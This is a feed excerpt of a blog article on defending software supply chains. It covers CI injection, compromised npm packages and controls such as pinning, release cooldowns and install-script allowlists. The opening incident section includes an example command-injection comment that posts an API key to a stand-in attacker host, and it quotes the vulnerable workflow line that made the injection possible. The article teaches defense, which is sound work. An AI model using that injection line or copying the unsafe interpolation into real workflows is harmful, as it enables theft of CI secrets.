&lt;td&gt;&lt;code&gt;aws sts assume-role-with-web-identity&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Shell injection (B9)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;actionlint&lt;/code&gt; + &lt;code&gt;zizmor&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;glab ci lint&lt;/code&gt;; &lt;code&gt;semgrep p/ci&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;&lt;code&gt;buildkite-pipeline-lint&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;circleci config validate&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Pipeline Linter; &lt;code&gt;pipeline-utility-steps&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;cfn-lint&lt;/code&gt; + &lt;code&gt;checkov&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Image signing identity (B6)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;OIDC issuer &lt;code&gt;token.actions.githubusercontent.com&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;CI_JOB_JWT_V2&lt;/code&gt; issuer&lt;/td&gt;
&lt;td&gt;Buildkite OIDC issuer&lt;/td&gt;
&lt;td&gt;&lt;code&gt;oidc.circleci.com&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;OIDC via plugin or workload identity&lt;/td&gt;
&lt;td&gt;CodeBuild OIDC tokens&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Cross-cutting tools, alphabetical:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Audit (CVE in deps):&lt;/strong&gt; pnpm/npm &lt;code&gt;audit&lt;/code&gt; → &lt;code&gt;pip-audit&lt;/code&gt; (Python), &lt;code&gt;mvn dependency-check:check&lt;/code&gt; or Gradle &lt;code&gt;dependencyCheckAnalyze&lt;/code&gt; (Java), &lt;code&gt;govulncheck&lt;/code&gt; (Go, symbol-aware reachability), &lt;code&gt;cargo audit&lt;/code&gt; + &lt;code&gt;cargo-deny&lt;/code&gt; (Rust), &lt;code&gt;bundler-audit&lt;/code&gt; (Ruby), &lt;code&gt;dotnet list package --vulnerable --include-transitive&lt;/code&gt; (.NET). Cross-stack: &lt;strong&gt;OSV-Scanner&lt;/strong&gt; (Google; OSV format covers all of the above), Snyk Open Source, Wiz, Socket.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Cosign:&lt;/strong&gt; ecosystem-agnostic. Works on any container image and on generic blobs.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;gitleaks:&lt;/strong&gt; stack-agnostic. Alternatives: &lt;code&gt;trufflehog&lt;/code&gt;, &lt;code&gt;detect-secrets&lt;/code&gt;, GitHub native push protection. Run several; they catch different things.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;CodeQL:&lt;/strong&gt; native multi-language (JS/TS, Python, Java, Kotlin, Go, Ruby, C#, C/C++, Swift). Alternatives: Semgrep Pro (broadest), Snyk Code, SonarCloud, Veracode.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;minimumReleaseAge&lt;/code&gt;:&lt;/strong&gt; native in pnpm. Universal via Renovate (&lt;code&gt;minimumReleaseAge&lt;/code&gt; config) covers npm, Maven, PyPI, Go, Cargo, NuGet, RubyGems, Helm, Docker, GH Actions, Terraform.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;SBOM:&lt;/strong&gt; &lt;code&gt;syft&lt;/code&gt; is stack-agnostic. Per-stack: &lt;code&gt;cyclonedx-bom&lt;/code&gt; (Python), &lt;code&gt;cyclonedx-maven-plugin&lt;/code&gt; (Java), &lt;code&gt;cyclonedx-gomod&lt;/code&gt; (Go), &lt;code&gt;cargo cyclonedx&lt;/code&gt; (Rust), &lt;code&gt;bundler-cyclonedx&lt;/code&gt; (Ruby), &lt;code&gt;dotnet CycloneDX&lt;/code&gt; (.NET). Consume with &lt;strong&gt;Dependency-Track&lt;/strong&gt;; scan with &lt;strong&gt;Trivy&lt;/strong&gt; or &lt;strong&gt;Grype&lt;/strong&gt;.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The boundary survives. The YAML changes.&lt;/p&gt;




&lt;h2&gt;
  
  
  Closing
&lt;/h2&gt;

&lt;p&gt;Last week a colleague's PR went red on &lt;code&gt;pinact --check --verify&lt;/code&gt; because they'd added &lt;code&gt;actions/checkout@v6&lt;/code&gt; instead of the SHA. Thirty seconds of annoyance. Without that gate, that line would have been one tag-rewrite away from &lt;code&gt;tj-actions&lt;/code&gt;. Repeat across 110 &lt;code&gt;uses:&lt;/code&gt; lines, 16 workflows, 7 production Dockerfiles, and one &lt;code&gt;_.template&lt;/code&gt; CVE that turned out not to matter and that's the week.&lt;/p&gt;

&lt;p&gt;The supply-chain attacker's leverage is asymmetric: one compromised maintainer, one rewritten tag, one unscanned dependency cascades into thousands of victims. The defender's leverage can be asymmetric too, but only if your controls live at the right boundary. SAST won't catch a malicious GitHub Action. A pen-test won't catch a tag rewrite. A bug bounty isn't going to surface an &lt;code&gt;_.template&lt;/code&gt; CVE buried four levels deep in a transitive dep nobody knew was there.&lt;/p&gt;

&lt;p&gt;The four-line diff at the top of this article wasn't found by SAST. It wasn't found by pen-test. It was found by a grep for &lt;code&gt;${{ github.event&lt;/code&gt; across every workflow in the monorepo, on a Tuesday, by someone who knew that string was the boundary between "code we wrote" and "code an attacker wrote for us."&lt;/p&gt;

&lt;p&gt;That grep took eleven seconds. The fix took four lines. The control that catches the next one was one commit.&lt;/p&gt;

&lt;p&gt;If you only take three things from this: pin every external CI reference (Action / include / plugin / orb / shared-library) to a content-addressed identifier; scope every CI permission block to least privilege; set a &lt;code&gt;minimumReleaseAge&lt;/code&gt; of at least 3 days on your package manager. Put the first two as required status checks on &lt;code&gt;main&lt;/code&gt;. Together they would have stopped &lt;a href="mailto:axios@1.14.1"&gt;axios@1.14.1&lt;/a&gt; cold for any pipeline running them, and tj-actions cold for every repo that ran it. The other nine boundaries are the layers behind that.&lt;/p&gt;

&lt;p&gt;For a regulated workload healthcare staffing means downtime maps to nurses missing shifts at hospitals, so we weight availability higher than most SaaS the calibration looks like: we tolerated +5 minutes of PR latency, but rejected anything that could block a hotfix at 2am. Your domain's calibration will differ. Write down why.&lt;/p&gt;

&lt;p&gt;If you've calibrated &lt;code&gt;minimumReleaseAge&lt;/code&gt; differently, I want to hear the number and why especially if you're in fintech or healthcare with stricter patch SLAs. Tell me I'm wrong about any of the trade-offs in the comments. I'd rather argue about the number here than discover the right answer at 2am during a credential-rotation drill because some maintainer's npm token leaked at lunch.&lt;/p&gt;




&lt;h2&gt;
  
  
  Appendix: minimal viable starter pack
&lt;/h2&gt;

&lt;p&gt;A team that has none of these in place can ship a meaningful subset in roughly a week, regardless of stack:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Lock manifests committed; CI install command refuses to mutate them.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;minimumReleaseAge&lt;/code&gt; (pnpm) or Renovate equivalent set to ≥ 3 days.&lt;/li&gt;
&lt;li&gt;Lifecycle-script default-deny: &lt;code&gt;pnpm.onlyBuiltDependencies&lt;/code&gt; allowlist + &lt;code&gt;--ignore-scripts&lt;/code&gt; in CI; equivalent gate per stack.&lt;/li&gt;
&lt;li&gt;Base images pinned by &lt;code&gt;@sha256:&lt;/code&gt; digest. Non-root &lt;code&gt;USER&lt;/code&gt; in every production image.&lt;/li&gt;
&lt;li&gt;Workflow / pipeline default-deny on permissions; per-job grants.&lt;/li&gt;
&lt;li&gt;Mutable references (&lt;code&gt;uses:&lt;/code&gt;, &lt;code&gt;include:&lt;/code&gt;, plugins, orbs, shared libs) pinned to commit SHAs; CI gate fails un-pinned PRs.&lt;/li&gt;
&lt;li&gt;Untrusted CI input passed via env vars, never interpolated into shell.&lt;/li&gt;
&lt;li&gt;Image signing via cosign + Sigstore (or stack-equivalent provenance).&lt;/li&gt;
&lt;li&gt;PR-time secret scanning (gitleaks / trufflehog).&lt;/li&gt;
&lt;li&gt;PR-time dependency CVE gate (&lt;code&gt;pnpm audit&lt;/code&gt; + per-stack equivalents above) with documented expiry-forced allowlist.&lt;/li&gt;
&lt;li&gt;Logger redaction at framework level for auth headers, cookies, password / token / secret keys.&lt;/li&gt;
&lt;li&gt;CODEOWNERS covering every file in this list.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Each item is a few lines of configuration. Total cost is roughly the week described above for a multiple projects monorepo; smaller repos proportionally less. The benefit, in our case, was being able to stop checking my phone on Sundays.&lt;/p&gt;

</description>
      <category>security</category>
      <category>devsecops</category>
      <category>githubactions</category>
      <category>supplychain</category>
    </item>
    <item>
      <title>Twelve Trust Boundaries: A Field Guide to Supply-Chain Defense After axios@1.14.1</title>
      <dc:creator>Ahmad Kanj</dc:creator>
      <pubDate>Fri, 08 May 2026 12:32:00 +0000</pubDate>
      <link>https://dev.to/aws-builders/twelve-trust-boundaries-a-field-guide-to-supply-chain-defense-after-1pna</link>
      <guid>https://dev.to/aws-builders/twelve-trust-boundaries-a-field-guide-to-supply-chain-defense-after-1pna</guid>
      <description>&lt;p&gt;On March 30, 2026, an attacker who had stolen an &lt;code&gt;axios&lt;/code&gt; maintainer's npm publish credentials pushed &lt;code&gt;axios@1.14.1&lt;/code&gt; to the registry. The version looked like a normal patch a single-digit bump from 1.14.0. It was live for roughly three hours before the maintainer rotated credentials and the version was unpublished.&lt;/p&gt;

&lt;p&gt;Three hours, on a Monday, during peak CI/CD hours across multiple time zones. Any team running &lt;code&gt;pnpm install&lt;/code&gt; or &lt;code&gt;npm install&lt;/code&gt; against a &lt;code&gt;^1.14.0&lt;/code&gt; constraint pulled &lt;code&gt;1.14.1&lt;/code&gt; automatically. (&lt;code&gt;^1.14.0&lt;/code&gt; means "any 1.x.y ≥ 1.14.0" most package managers express the same idea: &lt;code&gt;~=&lt;/code&gt; in pip, &lt;code&gt;^&lt;/code&gt; in Cargo, &lt;code&gt;~&amp;gt;&lt;/code&gt; in Gemfile.) No CVE was published during the window. SAST tools had nothing to flag.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;axios@1.14.1&lt;/code&gt; added one new transitive dependency (a dependency-of-a-dependency, pulled in indirectly): &lt;code&gt;plain-crypto-js@4.2.1&lt;/code&gt;. That package's &lt;code&gt;postinstall&lt;/code&gt; script, a hook the package manager runs automatically after install, the canonical Node footgun, with analogues in pip's &lt;code&gt;setup.py&lt;/code&gt; build hooks, Ruby's &lt;code&gt;gem extconf&lt;/code&gt;, and Cargo's &lt;code&gt;build.rs&lt;/code&gt; ran &lt;code&gt;node setup.js&lt;/code&gt;, which downloaded a Python-based RAT (Remote Access Trojan) from a C2 (command-and-control) server, exfiltrated environment variables and cloud credentials, and attempted to establish persistence on the build host. The compromise wouldn't have been visible to anyone glancing at the lockfile diff. A new transitive in a stable utility, the kind of churn most teams approve without thinking.&lt;/p&gt;

&lt;p&gt;Three hours is forever in CI. By the time npm pulled the version, the bytes had already shipped to thousands of build hosts.&lt;/p&gt;

&lt;p&gt;Two weeks before that incident, I was reading through a workflow in our own repo that lets engineers trigger an LLM code review by commenting &lt;code&gt;/review&lt;/code&gt; on a pull request. I stopped on this line:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# .github/workflows/opencode-review.yml:108&lt;/span&gt;
&lt;span class="s"&gt;COMMENT_BODY="${{ github.event.comment.body || '' }}"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The &lt;code&gt;if:&lt;/code&gt; block above it gated only on &lt;code&gt;startsWith(comment.body, '/review')&lt;/code&gt;. There was no &lt;code&gt;comment.author_association&lt;/code&gt; check. Anyone who could comment on a PR including a drive-by from a public fork could trigger this workflow. The job loaded &lt;code&gt;OPENROUTER_API_KEY&lt;/code&gt; from AWS Secrets Manager, and ran with &lt;code&gt;pull-requests: write&lt;/code&gt;, &lt;code&gt;issues: write&lt;/code&gt;, and AWS OIDC (OpenID Connect short-lived workload identity, used here instead of long-lived API keys) in scope.&lt;/p&gt;

&lt;p&gt;A comment body of &lt;code&gt;/review"; curl -X POST attacker.example/x -d "$OPENROUTER_API_KEY&lt;/code&gt; would have run on the next CI build. CWE-78: OS command injection, untrusted input concatenated into a shell command. Found, scoped, fixed in a four-line diff.&lt;/p&gt;

&lt;p&gt;Two attacks, very different mechanics. axios was a credential-theft → publish → postinstall chain at the registry boundary. The CWE-78 was a comment-string interpolation at the workflow boundary. The connection: in both cases the attacker didn't write code "in" the repo. They injected code by abusing a trust relationship we trusted axios's npm releases; we trusted GitHub event input. The perimeter is no longer your application. It's everything that runs before, during, and after your build, and the defense has to live in those same places.&lt;/p&gt;

&lt;p&gt;I work on a multiple projects monorepo (a single git repository hosting many services and libraries, JavaScript and TypeScript in our case, but the framework below maps to any monorepo or polyrepo, any language). A month after &lt;code&gt;axios@1.14.1&lt;/code&gt; shipped, a Slack message landed in our channel: &lt;em&gt;"we have Wiz, SonarCloud, gitleaks, Renovate but are we good?"&lt;/em&gt; Seven days later I had a triaged P0/P1/P2 list 12 P0s (auth, secrets, registry trust), 18 P1s (pinning, permissions, lifecycle), 17 P2s (logging, SBOM, hardening) and a branch with 48 files changed and +2,487 / −646 lines of supply-chain controls.&lt;/p&gt;

&lt;p&gt;What follows is the framework I use, the specific findings I hit, the trade-offs I made, and the equivalent control in your stack whether your repo is npm, pip, Maven, Go modules, Cargo, or RubyGems; whether your CI is GitHub Actions, GitLab, Buildkite, or Jenkins. The worked example here is pnpm and GitHub Actions because that's where I shipped it. The boundaries are stack-neutral.&lt;/p&gt;




&lt;h2&gt;
  
  
  Where the attack surface actually lives now
&lt;/h2&gt;

&lt;p&gt;Your application's attack surface is bounded. A handful of endpoints, an auth system, a database. You can audit it, pen-test it, threat-model it on a whiteboard in an afternoon.&lt;/p&gt;

&lt;p&gt;Your supply chain is not bounded. It's the transitive closure of every package you import, every CI Action / GitLab include / Buildkite plugin in every workflow, every base image &lt;code&gt;FROM&lt;/code&gt; line in every Dockerfile, every binary your CI runner downloads at build time, every preset, every fork, every "trusted" community helper.&lt;/p&gt;

&lt;p&gt;The math doesn't work in your favour. A typical mid-sized application resolves on the order of 1,000–3,000 transitive dependencies in its lockfile (the resolved-versions file your package manager writes &lt;code&gt;package-lock.json&lt;/code&gt;, &lt;code&gt;Pipfile.lock&lt;/code&gt;, &lt;code&gt;Cargo.lock&lt;/code&gt;, &lt;code&gt;Gemfile.lock&lt;/code&gt;, &lt;code&gt;go.sum&lt;/code&gt;). A typical CI pipeline chains 10–30 third-party Actions / plugins. Across a multi-year horizon, the probability that none of those maintainers gets phished, social-engineered or leaks a publish token approaches zero.&lt;/p&gt;

&lt;p&gt;Recent incidents to anchor frequency:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;2018: &lt;code&gt;event-stream&lt;/code&gt; (npm advisory 737):&lt;/strong&gt; maintainer handed package to a malicious "helpful contributor" who added a payload in a sub-dependency. Targeted exfiltration of private keys from the Copay/&lt;code&gt;copay-dash&lt;/code&gt; Bitcoin wallet specifically conditional payload, no effect on other consumers.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;2021: &lt;code&gt;ua-parser-js&lt;/code&gt;:&lt;/strong&gt; npm account takeover. Crypto miner and credential theft on every install. ~4 hours before takedown.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;2021: &lt;code&gt;codecov&lt;/code&gt; bash uploader (CVE-2021-32699):&lt;/strong&gt; modified upload script harvested CI environment variables. HashiCorp, Twilio, Confluent affected.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;2022: &lt;code&gt;node-ipc&lt;/code&gt; (CVE-2022-23812):&lt;/strong&gt; maintainer protestware. Wiped files on Russian and Belarusian IPs.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;2024: &lt;code&gt;xz-utils&lt;/code&gt; (CVE-2024-3094):&lt;/strong&gt; multi-year insider. The "Jia Tan" persona spent ~2 years building trust before merging an OpenSSH authentication backdoor via &lt;code&gt;liblzma&lt;/code&gt; linkage with a specific Ed448 key. Discovered by Postgres engineer Andres Freund investigating ~500 ms of &lt;code&gt;sshd&lt;/code&gt; login latency, before the affected versions reached most stable distributions.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;2024: &lt;code&gt;@solana/web3.js&lt;/code&gt; (GHSA-7493-mqf3-cv5g):&lt;/strong&gt; npm token compromise. Wallet drainer in published versions for ~5 hours.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;2025: &lt;code&gt;tj-actions/changed-files&lt;/code&gt; (CVE-2025-30066):&lt;/strong&gt; chained through &lt;code&gt;reviewdog/action-setup&lt;/code&gt; (CVE-2025-30154) → stolen PAT → retroactive semver-tag rewrite. ~218 repos confirmed leaked secrets out of ~23,000 references per StepSecurity / Wiz post-incident telemetry.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;2025: Shai-Hulud npm worm:&lt;/strong&gt; the first true self-replicating npm worm. A &lt;code&gt;postinstall&lt;/code&gt; harvested maintainer npm tokens and re-published the worm into every other package the victim maintained. ~180 packages compromised across multiple maintainer namespaces.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;2025: Nx &lt;code&gt;s1ngularity&lt;/code&gt; worm:&lt;/strong&gt; npm postinstall on compromised Nx versions harvested GitHub PATs, SSH keys, and crypto wallets from build hosts; backdoored downstream &lt;code&gt;nx-init-&lt;/code&gt; repositories. Directly relevant to anyone on an Nx monorepo.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;2026: &lt;code&gt;axios@1.14.1&lt;/code&gt;:&lt;/strong&gt; as above.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Strip the variations and you get four primitives that every modern attack chains: &lt;strong&gt;dependency injection&lt;/strong&gt; (typosquats, dependency confusion, maintainer compromise), &lt;strong&gt;build-time injection&lt;/strong&gt; (postinstall hooks, curl-bashed installers, malicious Actions), &lt;strong&gt;mutable-reference rewrite&lt;/strong&gt; (tag rewrites, branch tracking, CDN URLs without integrity), and &lt;strong&gt;trust-relationship abuse&lt;/strong&gt; (compromise a tooling vendor, an MFA, a token in a CI log). axios chained (4) → (1) → (2). tj-actions chained (4) → (1) → (3) → (2). Any single layer of defense would have broken either chain. Most repos had none of them.&lt;/p&gt;




&lt;h2&gt;
  
  
  The twelve boundaries
&lt;/h2&gt;

&lt;p&gt;Security engineers thinks in &lt;strong&gt;boundaries&lt;/strong&gt; points where trust transfers from one entity to another. Each boundary is a place attackers operate and a place defenders need a control. The twelve below split into three phases what enters your repo (1–4), what runs during your build (5–9), what ships at runtime (10–12) plus a final section on what to do when one of them fails. Some will.&lt;/p&gt;

&lt;h3&gt;
  
  
  Phase 1 Source-side: what enters your repo
&lt;/h3&gt;

&lt;h4&gt;
  
  
  Boundary 1: Source → Repository (Who can write to &lt;code&gt;main&lt;/code&gt;?)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Threat:&lt;/strong&gt; insider with too-broad write access; accidental merge of malicious code.&lt;br&gt;
&lt;strong&gt;Controls:&lt;/strong&gt; branch protection, required reviewers, CODEOWNERS for security-sensitive paths (workflows, Dockerfiles, dependency manifests). Force-push protection on protected branches. Required status checks must include the controls below.&lt;/p&gt;

&lt;p&gt;The forge-level (GitHub / GitLab / Bitbucket / Gerrit) primitives differ; the rule is identical: humans cannot push to &lt;code&gt;main&lt;/code&gt;; only the merge bot can, and only after policy passes.&lt;/p&gt;
&lt;h4&gt;
  
  
  Boundary 2: Maintainer → Package (Is this dependency safe?)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Threat:&lt;/strong&gt; typosquats, dependency confusion (publishing a public package whose name shadows a private one, tricking the resolver), maintainer compromise. &lt;code&gt;axios@1.14.1&lt;/code&gt; is the canonical example of the third published from a stolen credential, malicious for three hours, gone afterwards.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Controls registry-time:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Pin to immutable identifiers.&lt;/strong&gt; Lockfile committed; exact-version constraints; no caret/tilde ranges in production dependencies; &lt;code&gt;pnpm install --frozen-lockfile&lt;/code&gt; (or &lt;code&gt;npm ci&lt;/code&gt;, &lt;code&gt;pip install --require-hashes&lt;/code&gt;, &lt;code&gt;cargo --frozen --locked&lt;/code&gt;, &lt;code&gt;mvn -B verify&lt;/code&gt;, &lt;code&gt;bundle install --frozen&lt;/code&gt;, &lt;code&gt;dotnet restore --locked-mode&lt;/code&gt;) in CI. The general invariant: every dependency entry resolves to a content-addressed artifact, not a URL.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Cooldown on freshly published versions.&lt;/strong&gt; Reject packages younger than N days, on the premise that fresh-publish malware is detected and yanked within 24–72 hours. The premise has limits &lt;code&gt;xz-utils&lt;/code&gt; ran for ~2 years undetected so this control buys hours-to-days of latency, not certainty.&lt;br&gt;
&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;   &lt;span class="c1"&gt;# pnpm-workspace.yaml value is in minutes; 4320 min = 72 h = 3 days&lt;/span&gt;
   &lt;span class="na"&gt;minimumReleaseAge&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;4320&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;&lt;code&gt;axios@1.14.1&lt;/code&gt; was unpublished within three hours. With &lt;code&gt;minimumReleaseAge: 4320&lt;/code&gt;, pnpm would have refused to install it for 72 hours after publish. By the time the install would have unblocked, the malicious version was already gone.&lt;/p&gt;

&lt;p&gt;Stack-neutral: pnpm has this natively; Renovate's &lt;code&gt;minimumReleaseAge&lt;/code&gt; config covers npm, Maven, PyPI, Go, Cargo, NuGet, RubyGems, Helm, Docker, GH Actions, Terraform any ecosystem Renovate manages. For stacks without native or Renovate support, layer reputation signals: &lt;strong&gt;Socket&lt;/strong&gt; (behavioural risk score), &lt;strong&gt;Phylum&lt;/strong&gt; (heuristic quarantine), &lt;strong&gt;OSV-Scanner&lt;/strong&gt; + &lt;strong&gt;EPSS&lt;/strong&gt; scores for exploit-likelihood prioritisation, &lt;strong&gt;OpenSSF Scorecard&lt;/strong&gt; for upstream maintenance health, &lt;code&gt;npm audit signatures&lt;/code&gt; for registry signature verification.&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Provenance.&lt;/strong&gt; Where available, prefer packages published with provenance attestations. &lt;code&gt;npm publish --provenance&lt;/code&gt; (since npm 9.5) records a signed Sigstore provenance entry binding the published tarball to the GitHub Actions workflow that built it. PyPI Trusted Publishers + PEP 740 attestations are the Python equivalent. Maven Central PGP signatures + &lt;code&gt;sigstore-maven-plugin&lt;/code&gt; for Java. Provenance doesn't stop a credential-theft attack like axios the malicious workflow would still produce a signed entry but it gives forensics a starting point.&lt;/li&gt;
&lt;/ol&gt;
&lt;h4&gt;
  
  
  Boundary 3: Registry → Lockfile (Is the resolved artifact what we think it is?)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Threat:&lt;/strong&gt; registry compromise, off-registry tarballs without integrity, mid-flight tampering.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Controls:&lt;/strong&gt; lockfile committed; integrity hash (&lt;code&gt;sha512:&lt;/code&gt;, &lt;code&gt;sha256:&lt;/code&gt;, OCI digest) on every entry; CI install command refuses to mutate the lockfile. &lt;strong&gt;Easy thing to miss:&lt;/strong&gt; a lockfile entry like &lt;code&gt;tarball: https://cdn.somehost.com/foo.tgz&lt;/code&gt; without an &lt;code&gt;integrity:&lt;/code&gt; field is functionally &lt;code&gt;latest&lt;/code&gt;. Audit yours for entries where the hash field is empty or pointing to a URL the registry doesn't verify.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# tools/scripts/verify-supply-chain.sh runs in CI&lt;/span&gt;
&lt;span class="c"&gt;# Fails if the lockfile contains any off-registry tarball not on this allowlist.&lt;/span&gt;
&lt;span class="nv"&gt;EXPECTED_TARBALLS&lt;/span&gt;&lt;span class="o"&gt;=(&lt;/span&gt;
  &lt;span class="s2"&gt;"https://cdn.sheetjs.com/xlsx-0.20.3/xlsx-0.20.3.tgz"&lt;/span&gt;  &lt;span class="c"&gt;# SheetJS withdrew xlsx from npm in 2023&lt;/span&gt;
&lt;span class="o"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This single grep-equivalent check would also have flagged the &lt;code&gt;axios@1.14.1&lt;/code&gt; situation early in retrospect: a brand-new transitive (&lt;code&gt;plain-crypto-js@4.2.1&lt;/code&gt;) appeared in the lockfile diff. A mandatory PR-time review on lockfile additions catches what the eye doesn't.&lt;/p&gt;

&lt;p&gt;The general invariant translates: pip's &lt;code&gt;--require-hashes&lt;/code&gt;, Cargo's checksum field, Maven's &lt;code&gt;--strict-checksums&lt;/code&gt;, NuGet package signing, Go's module sum database every modern package manager has the primitive. The discipline is auditing for entries where it isn't enforced.&lt;/p&gt;

&lt;h4&gt;
  
  
  Boundary 4: Install → Lifecycle scripts (What runs on install?)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Threat:&lt;/strong&gt; malicious lifecycle hooks. The axios attack's payload ran here. &lt;code&gt;plain-crypto-js@4.2.1&lt;/code&gt;'s entire malicious behaviour was a &lt;code&gt;postinstall: node setup.js&lt;/code&gt;. Without that hook, the package would have sat on disk doing nothing until something &lt;code&gt;require()&lt;/code&gt;'d it and &lt;code&gt;axios&lt;/code&gt; doesn't import &lt;code&gt;plain-crypto-js&lt;/code&gt;. The postinstall was the only thing that turned a passive disk write into RCE during install.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Controls:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Default-deny on install scripts&lt;/strong&gt;, allowlist of who may run them:
&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="w"&gt;   &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
     &lt;/span&gt;&lt;span class="nl"&gt;"pnpm"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
       &lt;/span&gt;&lt;span class="nl"&gt;"onlyBuiltDependencies"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="w"&gt;
         &lt;/span&gt;&lt;span class="s2"&gt;"esbuild"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
         &lt;/span&gt;&lt;span class="s2"&gt;"@swc/core"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
         &lt;/span&gt;&lt;span class="s2"&gt;"@datadog/native-iast-taint-tracking"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
         &lt;/span&gt;&lt;span class="s2"&gt;"prisma"&lt;/span&gt;&lt;span class="w"&gt;
       &lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="w"&gt;
     &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
   &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;code&gt;plain-crypto-js&lt;/code&gt; would not have been on any team's allowlist. &lt;code&gt;pnpm install --ignore-scripts&lt;/code&gt; (read-only CI workflows) and &lt;code&gt;onlyBuiltDependencies&lt;/code&gt; (pnpm 10) each, independently, neutralise the postinstall vector.&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Behavioural quarantine.&lt;/strong&gt; &lt;code&gt;Socket&lt;/code&gt; and &lt;code&gt;Phylum&lt;/code&gt; analyse new transitives for suspicious patterns (network calls, file-system access, dynamic eval) before they reach your lockfile. &lt;code&gt;npq&lt;/code&gt; wraps &lt;code&gt;npm install&lt;/code&gt; to prompt before installing freshly published packages. None of these would catch a sufficiently subtle payload, but &lt;code&gt;plain-crypto-js&lt;/code&gt;'s &lt;code&gt;node setup.js&lt;/code&gt; → C2 download is exactly the shape they flag.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Build-host sandboxing.&lt;/strong&gt; Run installs inside an ephemeral container with no network egress except to the registry; or use Bubblewrap / Firejail / Chainguard's hardened images. Defence-in-depth for the case where the lifecycle gate fails open.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

